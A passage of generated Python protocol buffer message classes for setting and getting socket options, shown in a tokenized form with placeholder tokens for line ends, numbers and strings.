<EOL> if self . has_peer_ip_ != x . has_peer_ip_ : return <NUM_LIT:0> <EOL> if self . has_peer_ip_ and self . peer_ip_ != x . peer_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_peer_ip_ and not self . peer_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_peer_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . peer_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_peer_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . peer_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_peer_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_peer_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . peer_ip_ . ByteSize ( ) ) <EOL> self . peer_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_peer_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . peer_ip_ . ByteSizePartial ( ) ) <EOL> self . peer_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_peer_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_peer_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . peer_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kpeer_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SocketOption ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_SOL_IP = <NUM_LIT:0> <EOL> SOCKET_SOL_SOCKET = <NUM_LIT:1> <EOL> SOCKET_SOL_TCP = <NUM_LIT:6> <EOL> SOCKET_SOL_UDP = <NUM_LIT> <EOL> _SocketOptionLevel_NAMES = { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> } <EOL> def SocketOptionLevel_Name ( cls , x ) : return cls . _SocketOptionLevel_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketOptionLevel_Name = classmethod ( SocketOptionLevel_Name ) <EOL> SOCKET_SO_DEBUG = <NUM_LIT:1> <EOL> SOCKET_SO_REUSEADDR = <NUM_LIT:2> <EOL> SOCKET_SO_TYPE = <NUM_LIT:3> <EOL> SOCKET_SO_ERROR = <NUM_LIT:4> <EOL> SOCKET_SO_DONTROUTE = <NUM_LIT:5> <EOL> SOCKET_SO_BROADCAST = <NUM_LIT:6> <EOL> SOCKET_SO_SNDBUF = <NUM_LIT:7> <EOL> SOCKET_SO_RCVBUF = <NUM_LIT:8> <EOL> SOCKET_SO_KEEPALIVE = <NUM_LIT:9> <EOL> SOCKET_SO_OOBINLINE = <NUM_LIT:10> <EOL> SOCKET_SO_LINGER = <NUM_LIT> <EOL> SOCKET_SO_RCVTIMEO = <NUM_LIT:20> <EOL> SOCKET_SO_SNDTIMEO = <NUM_LIT> <EOL> SOCKET_IP_TOS = <NUM_LIT:1> <EOL> SOCKET_IP_TTL = <NUM_LIT:2> <EOL> SOCKET_IP_HDRINCL = <NUM_LIT:3> <EOL> SOCKET_IP_OPTIONS = <NUM_LIT:4> <EOL> SOCKET_TCP_NODELAY = <NUM_LIT:1> <EOL> SOCKET_TCP_MAXSEG = <NUM_LIT:2> <EOL> SOCKET_TCP_CORK = <NUM_LIT:3> <EOL> SOCKET_TCP_KEEPIDLE = <NUM_LIT:4> <EOL> SOCKET_TCP_KEEPINTVL = <NUM_LIT:5> <EOL> SOCKET_TCP_KEEPCNT = <NUM_LIT:6> <EOL> SOCKET_TCP_SYNCNT = <NUM_LIT:7> <EOL> SOCKET_TCP_LINGER2 = <NUM_LIT:8> <EOL> SOCKET_TCP_DEFER_ACCEPT = <NUM_LIT:9> <EOL> SOCKET_TCP_WINDOW_CLAMP = <NUM_LIT:10> <EOL> SOCKET_TCP_INFO = <NUM_LIT:11> <EOL> SOCKET_TCP_QUICKACK = <NUM_LIT:12> <EOL> _SocketOptionName_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:20> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <EOL> <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <EOL> <NUM_LIT:9> : "<STR_LIT>" , <EOL> <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <EOL> <NUM_LIT:12> : "<STR_LIT>" , <EOL> } <EOL> def SocketOptionName_Name ( cls , x ) : return cls . _SocketOptionName_NAMES . get ( x , "<STR_LIT>" ) <EOL> SocketOptionName_Name = classmethod ( SocketOptionName_Name ) <EOL> has_level_ = <NUM_LIT:0> <EOL> level_ = <NUM_LIT:0> <EOL> has_option_ = <NUM_LIT:0> <EOL> option_ = <NUM_LIT:0> <EOL> has_value_ = <NUM_LIT:0> <EOL> value_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def level ( self ) : return self . level_ <EOL> def set_level ( self , x ) : <EOL> self . has_level_ = <NUM_LIT:1> <EOL> self . level_ = x <EOL> def clear_level ( self ) : <EOL> if self . has_level_ : <EOL> self . has_level_ = <NUM_LIT:0> <EOL> self . level_ = <NUM_LIT:0> <EOL> def has_level ( self ) : return self . has_level_ <EOL> def option ( self ) : return self . option_ <EOL> def set_option ( self , x ) : <EOL> self . has_option_ = <NUM_LIT:1> <EOL> self . option_ = x <EOL> def clear_option ( self ) : <EOL> if self . has_option_ : <EOL> self . has_option_ = <NUM_LIT:0> <EOL> self . option_ = <NUM_LIT:0> <EOL> def has_option ( self ) : return self . has_option_ <EOL> def value ( self ) : return self . value_ <EOL> def set_value ( self , x ) : <EOL> self . has_value_ = <NUM_LIT:1> <EOL> self . value_ = x <EOL> def clear_value ( self ) : <EOL> if self . has_value_ : <EOL> self . has_value_ = <NUM_LIT:0> <EOL> self . value_ = "<STR_LIT>" <EOL> def has_value ( self ) : return self . has_value_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_level ( ) ) : self . set_level ( x . level ( ) ) <EOL> if ( x . has_option ( ) ) : self . set_option ( x . option ( ) ) <EOL> if ( x . has_value ( ) ) : self . set_value ( x . value ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_level_ != x . has_level_ : return <NUM_LIT:0> <EOL> if self . has_level_ and self . level_ != x . level_ : return <NUM_LIT:0> <EOL> if self . has_option_ != x . has_option_ : return <NUM_LIT:0> <EOL> if self . has_option_ and self . option_ != x . option_ : return <NUM_LIT:0> <EOL> if self . has_value_ != x . has_value_ : return <NUM_LIT:0> <EOL> if self . has_value_ and self . value_ != x . value_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_level_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_option_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_value_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthVarInt64 ( self . level_ ) <EOL> n += self . lengthVarInt64 ( self . option_ ) <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_level_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . level_ ) <EOL> if ( self . has_option_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . option_ ) <EOL> if ( self . has_value_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . value_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_level ( ) <EOL> self . clear_option ( ) <EOL> self . clear_value ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . level_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . option_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_level_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:8> ) <EOL> out . putVarInt32 ( self . level_ ) <EOL> if ( self . has_option_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . option_ ) <EOL> if ( self . has_value_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . value_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:8> : <EOL> self . set_level ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_option ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_value ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_level_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . level_ ) ) <EOL> if self . has_option_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . option_ ) ) <EOL> if self . has_value_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . value_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> klevel = <NUM_LIT:1> <EOL> koption = <NUM_LIT:2> <EOL> kvalue = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT:value>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SetSocketOptionsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_options ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SetSocketOptionsReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketOptionsRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def mutable_options ( self , i ) : <EOL> return self . options_ [ i ] <EOL> def add_options ( self ) : <EOL> x = SocketOption ( ) <EOL> self . options_ . append ( x ) <EOL> return x <EOL> def clear_options ( self ) : <EOL> self . options_ = [ ] <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> for i in xrange ( x . options_size ( ) ) : self . add_options ( ) . CopyFrom ( x . options ( i ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if len ( self . options_ ) != len ( x . options_ ) : return <NUM_LIT:0> <EOL> for e1 , e2 in zip ( self . options_ , x . options_ ) : <EOL> if e1 != e2 : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> for p in self . options_ : <EOL> if not p . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSize ( ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += <NUM_LIT:1> * len ( self . options_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : n += self . lengthString ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_options ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSize ( ) ) <EOL> self . options_ [ i ] . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> for i in xrange ( len ( self . options_ ) ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . options_ [ i ] . ByteSizePartial ( ) ) <EOL> self . options_ [ i ] . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . add_options ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> cnt = <NUM_LIT:0> <EOL> for e in self . options_ : <EOL> elm = "<STR_LIT>" <EOL> if printElemNumber : elm = "<STR_LIT>" % cnt <EOL> res += prefix + ( "<STR_LIT>" % elm ) <EOL> res += e . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> cnt += <NUM_LIT:1> <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> koptions = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketOptionsReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> self . options_ = [ ] <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def options_size ( self ) : return len ( self . options_ ) <EOL> def options_list ( self ) : return self . options_ <EOL> def options ( self , i ) : <EOL> return self . options_ [ i ] 